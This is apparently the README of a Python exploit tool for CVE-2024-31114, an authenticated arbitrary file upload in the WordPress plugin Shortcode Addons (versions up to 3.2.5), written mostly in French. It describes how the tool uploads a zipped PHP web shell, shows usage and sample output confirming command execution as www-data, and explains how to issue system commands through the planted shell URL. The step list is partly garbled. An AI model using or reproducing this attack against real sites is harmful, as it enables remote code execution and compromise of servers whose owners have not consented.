
Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
Shortcode Addons <= 3.2.5 – Téléchargement arbitraire de fichiers authentifié (Admin+)
CVE ID: CVE-2024-31114
Score CVSS : 9.1 (Critique)
Le plugin Shortcode Addons – avec Visual Composer, Divi, Beaver Builder et Elementor Extension pour WordPress est vulnérable aux téléchargements arbitraires de fichiers en raison de l'absence de validation du type de fichier dans toutes les versions jusqu'à la version 3.2.5 incluse.
Cette faille permet à des attaquants authentifiés disposant d'un accès de niveau administrateur ou supérieur de télécharger des fichiers arbitraires sur le serveur — ce qui peut entraîner une exécution de code à distance (RCE).
Ce script Python automatise l'exploitation de la vulnérabilité. Il effectue :
_wpnonce)nxploit.php).zipwhoami sur le serveur cibleusage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target URL (e.g. http://target.com)
-un, --username USERNAME WordPress Admin Username
-p, --password PASSWORD WordPress Admin Password
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.
Une fois la charge utile téléchargée, vous pouvez exécuter des commandes système en utilisant le format suivant :
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
🔹 Exemple :
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
Cela listera le contenu du répertoire courant sur le serveur.
Cet outil est destiné uniquement à des fins éducatives et de tests autorisés.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce script.
Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de test.
Par : Nxploited | Khaled Alenazi